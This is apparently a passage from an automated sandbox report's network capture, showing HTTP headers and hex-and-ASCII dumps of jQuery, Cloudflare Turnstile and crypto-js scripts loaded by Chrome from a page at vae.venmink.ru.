                                                                    2024-12-19 16:51:15 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                    Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                    2024-12-19 16:51:15 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                    Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                    2024-12-19 16:51:15 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                    Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                    2024-12-19 16:51:15 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                    Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                    2024-12-19 16:51:15 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                    Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                    2024-12-19 16:51:15 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                    Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549721104.18.94.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:14 UTC558OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://vae.venmink.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:15 UTC386INHTTP/1.1 302 Found
                                                                    Date: Thu, 19 Dec 2024 16:51:15 GMT
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                    cross-origin-resource-policy: cross-origin
                                                                    location: /turnstile/v0/b/787bc399e22f/api.js
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e573bf7a4370-EWR
                                                                    alt-svc: h3=":443"; ma=86400


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549726104.18.94.414431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:16 UTC557OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: script
                                                                    Referer: https://vae.venmink.ru/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:17 UTC471INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:16 GMT
                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                    Content-Length: 47692
                                                                    Connection: close
                                                                    accept-ranges: bytes
                                                                    last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                    cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                    access-control-allow-origin: *
                                                                    cross-origin-resource-policy: cross-origin
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f48e57e7b977c9f-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                    Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 72 29 7b 76 61 72 20 6e 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 68 3b 74 72 79 7b 66 6f 72 28 6e 3d 6e 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 6e 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                    Data Ascii: t(e){if(Array.isArray(e))return e}function qt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 70 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 70 5b 30 5d 26 26 28 6e 3d 30 29 29 2c 6e 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 70 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 70 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 70 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 70 3d 5b 70 5b 30 5d 26 32 2c 75 2e 76 61 6c
                                                                    Data Ascii: ])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.val
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 29 29 3b 76 61 72 20 50 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 50 65 7c 7c 28 50 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 76 65 72 69 66 79 69 6e 67 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 5f 4f 56 45 52 52 55 4e 3d 22 76 65 72 69 66 79 69 6e 67 2d 6f 76 65 72 72 75 6e 22 2c 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69
                                                                    Data Ascii: ));var Pe;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Pe||(Pe={}));var Se;(function(e){e.VERIFYING="verifying",e.VERIFYING_HAVING_TROUBLES="verifying-having-troubles",e.VERIFYING_OVERRUN="verifying-overrun",e.FAILURE_WO_HAVING_TROUBLES="fai
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 69 74 7c 7c 28 69 74 3d 7b 7d 29 29 3b 76 61 72 20 57 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 3d 22 66 61 69 6c 75 72 65 22 2c 65 2e 56 45 52 49 46 59 49 4e 47 3d 22 76 65 72 69 66 79 69 6e 67 22 2c 65 2e 4f 56 45 52 52 55 4e 4e 49 4e 47 3d 22 6f 76 65 72 72 75 6e 6e 69 6e 67 22 2c 65 2e 43 55 53 54 4f 4d 3d 22 63 75 73 74 6f 6d 22 7d 29 28 57 65 7c 7c 28 57 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72
                                                                    Data Ascii: ING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(it||(it={}));var We;(function(e){e.FAILURE="failure",e.VERIFYING="verifying",e.OVERRUNNING="overrunning",e.CUSTOM="custom"})(We||(We={}));function M(e,r){return e.indexOf(r)!==-1}function ot(e){r
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 29 29 2c 72 2e 73 69 7a 65 21 3d 3d 30 29 72 65 74 75 72 6e 20 72 2e 74 6f 53 74 72 69 6e 67 28 29 7d 76 61 72 20 48 65 3d 22 63 66 2d 63 68 6c 2d 77 69 64 67 65 74 2d 22 2c 56 3d 22 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 5a 74 3d 22 2e 63 66 2d 74 75 72 6e 73 74 69 6c 65 22 2c 65 72 3d 22 2e 63 66 2d 63 68 61 6c 6c 65 6e 67 65 22 2c 74 72 3d 22 2e 67 2d 72 65 63 61 70 74 63 68 61 22 2c 5f 74 3d 22 63 66 5f 63 68 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 62 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 45 74 3d 22 67 2d 72 65 63 61 70
                                                                    Data Ascii: el",e.params._debugSitekeyOverrides.clearance_level)),r.size!==0)return r.toString()}var He="cf-chl-widget-",V="cloudflare-challenge",Zt=".cf-turnstile",er=".cf-challenge",tr=".g-recaptcha",_t="cf_challenge_response",bt="cf-turnstile-response",Et="g-recap
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 65 78 69 73 74 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6f 3f 4d 72 28 7b 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3a 6c 2c 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 3a 67 2c 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 3a 63 7d 29 3a 63 26 26 67 3f 22 35 32 30 70 78 22 3a 63 26 26 6c 3f 22 35 30 30 70 78 22 3a 63 3f 22 34 38 30 70 78 22 3a 67 3f 22 35 38 30 70 78 22 3a 22 35 37 30 70 78 22 7d 2c 4d 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 65 2e 69 73 56 65 72 62 6f 73 65 4c 61 6e 67 75 61 67 65 2c 6e 3d 65 2e 69 73 53 6d 61 6c 6c 65 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 6e 26 26 72 3f 22 35 34 30 70 78 22 3a 6e 26 26 6f 3f
                                                                    Data Ascii: existent");return o?Mr({isModeratelyVerbose:l,isVerboseLanguage:g,isSmallerFeedback:c}):c&&g?"520px":c&&l?"500px":c?"480px":g?"580px":"570px"},Mr=function(e){var r=e.isVerboseLanguage,n=e.isSmallerFeedback,o=e.isModeratelyVerbose;return n&&r?"540px":n&&o?
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 6e 29 7d 2c 63 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 29 7b 72 65 74 75 72 6e 20 46 75 6e 63 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4d 61 70 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 6e 65 77 20 4d 61 70 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 71 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 75 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e
                                                                    Data Ascii: __||Object.getPrototypeOf(n)},ce(e)}function ur(e){return Function.toString.call(e).indexOf("[native code]")!==-1}function qe(e){var r=typeof Map=="function"?new Map:void 0;return qe=function(o){if(o===null||!ur(o))return o;if(typeof o!="function")throw n
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 26 26 65 2e 74 65 73 74 28 72 2e 73 72 63 29 29 72 65 74 75 72 6e 20 72 3b 66 6f 72 28 76 61 72 20 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 73 63 72 69 70 74 22 29 2c 6f 3d 30 2c 63 3b 63 3d 6e 5b 6f 5d 3b 6f 2b 2b 29 69 66 28 44 28 63 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 63 2e 73 72 63 29 29 72 65 74 75 72 6e 20 63 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 29 7b 76 61 72 20 65 3d 41 74 28 29 3b 65 7c 7c 6d 28 22 43 6f 75 6c 64 20 6e 6f 74 20 66 69 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d
                                                                    Data Ascii: &&e.test(r.src))return r;for(var n=document.querySelectorAll("script"),o=0,c;c=n[o];o++)if(D(c,HTMLScriptElement)&&e.test(c.src))return c}function fr(){var e=At();e||m("Could not find Turnstile script tag, some features may not be available",43777);var r=
                                                                    2024-12-19 16:51:17 UTC1369INData Raw: 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 45 2e 69 64 3d 22 63 66 2d 66 72 2d 69 64 22 2c 45 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 45 2e 73 74 79 6c 65 2e 6d 61 78 57 69 64 74 68 3d 22 34 35 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 52 74 28 72 29 2c 45 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 72 65 6c 61 74 69 76 65 22 2c 45 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 37 22 2c 45 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 45 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 35 70 78 22 2c 45 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 45 2e 73 74 79 6c 65 2e
                                                                    Data Ascii: me="cf-turnstile-feedback",E.id="cf-fr-id",E.style.width="100vw",E.style.maxWidth="450px",E.style.height=Rt(r),E.style.position="relative",E.style.zIndex="2147483647",E.style.backgroundColor="#ffffff",E.style.borderRadius="5px",E.style.left="0px",E.style.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549728104.17.25.144431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:17 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                    Host: cdnjs.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:17 UTC959INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:17 GMT
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Cache-Control: public, max-age=30672000
                                                                    ETag: W/"61182885-40eb"
                                                                    Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                    cf-cdnjs-via: cfworker/kv
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    Timing-Allow-Origin: *
                                                                    X-Content-Type-Options: nosniff
                                                                    CF-Cache-Status: HIT
                                                                    Age: 82932
                                                                    Expires: Tue, 09 Dec 2025 16:51:17 GMT
